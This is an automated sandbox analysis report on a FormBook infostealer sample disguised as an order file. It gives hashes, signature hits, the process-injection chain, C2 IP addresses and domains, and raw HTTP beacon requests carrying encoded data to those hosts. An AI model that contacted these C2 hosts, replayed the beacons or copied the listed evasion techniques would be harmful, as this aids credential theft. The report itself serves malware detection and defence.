Edit tour

Windows Analysis Report
New order BPD-003777.exe

Overview

General Information

Sample name:	New order BPD-003777.exe
Analysis ID:	1592115
MD5:	cdbcbd452bca36deca0ea24b88293819
SHA1:	8216c595da35091e155337251d9502b5ec4ef4b8
SHA256:	ab747891c631a8672fc8332ce62eb3fe52f8aee61babfec5b486758cae137363
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Creation with Colorcpl

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate keystroke presses

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

New order BPD-003777.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\New order BPD-003777.exe" MD5: CDBCBD452BCA36DECA0EA24B88293819)

svchost.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\New order BPD-003777.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

xTzxorEdKnFN.exe (PID: 5580 cmdline: "C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

colorcpl.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

xTzxorEdKnFN.exe (PID: 5236 cmdline: "C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 8176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3629802561.0000000002F90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3629846283.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3628819504.0000000000820000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2272460449.0000000002980000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2276142415.0000000003F50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.700000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.700000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Creation with Colorcpl

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7964, TargetFilename: C:\Users\user

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\New order BPD-003777.exe", CommandLine: "C:\Users\user\Desktop\New order BPD-003777.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\New order BPD-003777.exe", ParentImage: C:\Users\user\Desktop\New order BPD-003777.exe, ParentProcessId: 7548, ParentProcessName: New order BPD-003777.exe, ProcessCommandLine: "C:\Users\user\Desktop\New order BPD-003777.exe", ProcessId: 7572, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\New order BPD-003777.exe", CommandLine: "C:\Users\user\Desktop\New order BPD-003777.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\New order BPD-003777.exe", ParentImage: C:\Users\user\Desktop\New order BPD-003777.exe, ParentProcessId: 7548, ParentProcessName: New order BPD-003777.exe, ProcessCommandLine: "C:\Users\user\Desktop\New order BPD-003777.exe", ProcessId: 7572, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T19:41:07.949280+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64256	46.38.243.234	80	TCP
2025-01-15T19:41:31.133991+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64404	13.248.169.48	80	TCP
2025-01-15T19:41:44.459079+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64441	217.160.0.207	80	TCP
2025-01-15T19:41:57.829797+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64445	136.243.64.147	80	TCP
2025-01-15T19:42:11.656959+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64449	162.218.30.235	80	TCP
2025-01-15T19:42:24.976585+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64453	104.21.32.1	80	TCP
2025-01-15T19:42:38.298340+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64457	162.0.236.169	80	TCP
2025-01-15T19:42:51.639586+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64461	185.68.108.243	80	TCP
2025-01-15T19:43:11.457952+0100	2855465	1	A Network Trojan was detected	192.168.2.4	64465	172.67.183.191	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T19:41:23.489237+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64354	13.248.169.48	80	TCP
2025-01-15T19:41:26.054634+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64370	13.248.169.48	80	TCP
2025-01-15T19:41:28.603170+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64388	13.248.169.48	80	TCP
2025-01-15T19:41:36.862021+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64438	217.160.0.207	80	TCP
2025-01-15T19:41:39.380475+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64439	217.160.0.207	80	TCP
2025-01-15T19:41:41.914818+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64440	217.160.0.207	80	TCP
2025-01-15T19:41:50.284439+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64442	136.243.64.147	80	TCP
2025-01-15T19:41:52.744770+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64443	136.243.64.147	80	TCP
2025-01-15T19:41:55.289744+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64444	136.243.64.147	80	TCP
2025-01-15T19:42:03.953573+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64446	162.218.30.235	80	TCP
2025-01-15T19:42:06.530685+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64447	162.218.30.235	80	TCP
2025-01-15T19:42:09.091406+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64448	162.218.30.235	80	TCP
2025-01-15T19:42:17.328074+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64450	104.21.32.1	80	TCP
2025-01-15T19:42:19.873608+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64451	104.21.32.1	80	TCP
2025-01-15T19:42:22.439290+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64452	104.21.32.1	80	TCP
2025-01-15T19:42:30.642921+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64454	162.0.236.169	80	TCP
2025-01-15T19:42:33.216253+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64455	162.0.236.169	80	TCP
2025-01-15T19:42:35.798206+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64456	162.0.236.169	80	TCP
2025-01-15T19:42:44.020829+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64458	185.68.108.243	80	TCP
2025-01-15T19:42:46.558867+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64459	185.68.108.243	80	TCP
2025-01-15T19:42:49.115025+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64460	185.68.108.243	80	TCP
2025-01-15T19:43:02.573791+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64462	172.67.183.191	80	TCP
2025-01-15T19:43:05.435795+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64463	172.67.183.191	80	TCP
2025-01-15T19:43:08.536807+0100	2855464	1	A Network Trojan was detected	192.168.2.4	64464	172.67.183.191	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T19:43:02.573791+0100	2856318	1	A Network Trojan was detected	192.168.2.4	64462	172.67.183.191	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: New order BPD-003777.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.cikolatasampuan.xyz/sbv2/?PZtTT8P0=KCOXl4L0MjZtpt9om/tmYw0VttOad0yMCs4OQKkXNc8VH0itCYxOihExehlokU3aZEnUGvFTmMELvqtU+Kox5tVgQ7KRBTJUg1vzgVjJ1xaulaVtzEKyyvI=&-HT0=eZZx0LUhp4u8Nb7	Avira URL Cloud: Label: malware
Source: http://www.cikolatasampuan.xyz/sbv2/	Avira URL Cloud: Label: malware
Source: http://www.accusolution.pro/s4sk/?PZtTT8P0=w1z0LxExs9MXILOhkTw/05qIOC9wPz9pW67ass2TZN6sDGg0GyeGaAU8sMVSePVNOj9ELn/nlJfz7v0haQuSr/gZC77LrnvOb7BfL6JpYx8NJq7/9PXIC+k=&-HT0=eZZx0LUhp4u8Nb7	Avira URL Cloud: Label: malware
Source: http://www.accusolution.pro/s4sk/	Avira URL Cloud: Label: malware
Source: http://cikolatasampuan.xyz/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: New order BPD-003777.exe	Virustotal: Detection: 39%			Perma Link
Source: New order BPD-003777.exe	ReversingLabs: Detection: 50%

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3629802561.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3629846283.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3628819504.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2272460449.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2276142415.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: New order BPD-003777.exe

Joe Sandbox ML: detected

Source: New order BPD-003777.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: colorcpl.pdbGCTL source: svchost.exe, 00000001.00000003.2241213497.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2241288175.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2241307300.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, xTzxorEdKnFN.exe, 00000005.00000002.3629196408.0000000000E78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: svchost.exe, 00000001.00000003.2241213497.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2241288175.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2241307300.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, xTzxorEdKnFN.exe, 00000005.00000002.3629196408.0000000000E78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xTzxorEdKnFN.exe, 00000005.00000002.3629049405.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3629749593.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: New order BPD-003777.exe, 00000000.00000003.1773914994.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, New order BPD-003777.exe, 00000000.00000003.1777371053.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2184369007.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2186183627.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2272638847.000000000339E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2277328043.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2272230690.000000000480A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: New order BPD-003777.exe, 00000000.00000003.1773914994.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, New order BPD-003777.exe, 00000000.00000003.1777371053.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2184369007.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2186183627.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2272638847.000000000339E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2277328043.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2272230690.000000000480A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: colorcpl.exe, 00000006.00000002.3630401859.000000000518C000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3628717504.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2562375462.000000001F3DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: colorcpl.exe, 00000006.00000002.3630401859.000000000518C000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3628717504.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2562375462.000000001F3DC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,		0_2_002EDBBE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029CC5A0 FindFirstFileW,FindNextFileW,FindClose,		6_2_029CC5A0

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then xor eax, eax		6_2_029BA020
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then mov ebx, 00000004h		6_2_049B04E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64256 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64404 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64453 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64441 -> 217.160.0.207:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64449 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64462 -> 172.67.183.191:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64370 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64388 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64446 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64443 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64450 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64454 -> 162.0.236.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64448 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:64462 -> 172.67.183.191:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64354 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64444 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64463 -> 172.67.183.191:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64460 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64456 -> 162.0.236.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64461 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64440 -> 217.160.0.207:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64438 -> 217.160.0.207:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64451 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64458 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64452 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64442 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64455 -> 162.0.236.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64447 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64439 -> 217.160.0.207:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64457 -> 162.0.236.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64445 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64464 -> 172.67.183.191:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64459 -> 185.68.108.243:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:64465 -> 172.67.183.191:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.l33900.xyz
Source:	DNS query: www.cikolatasampuan.xyz

Source: global traffic

TCP traffic: 192.168.2.4:64165 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /01t1/?PZtTT8P0=1orlDBOBFQxYzSuWLacVhHe2PDi9PTCa7cnqSRM6j2dTNHZ3aoLms1oR3jIyiKF+ssvS0FwSw+yrc7LLwgLD18XxPZI4FqTqW/SwUul9eN4m0LS6rOGRGO8=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1Host: www.mraber.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Source: global traffic	HTTP traffic detected: GET /yrw8/?PZtTT8P0=RFR6bYZjT9m40Qm+zbryzANOuUFT5Vwsrp8mJhbrSqaa0hAU+0NzQA7l3HeOPbt8HBkBLiHPDpxMijTsjbxyiMcdqRih2VgGUZM/FBv+f3nAi4b7MCsEdgs=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1Host: www.blockconnect.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Source: global traffic	HTTP traffic detected: GET /tc4z/?PZtTT8P0=ny3bLW3OcbOKXixzoTTFtaWz9zwbCAlCkXueetxIQf0InYmFA4wH3zQZz5ZeXWajS8kP4gBJ8eOTYb+e2w2GS9Rfuczm284n9HscOXcNPb7iGn3oZX2z0bs=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1Host: www.jackys.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
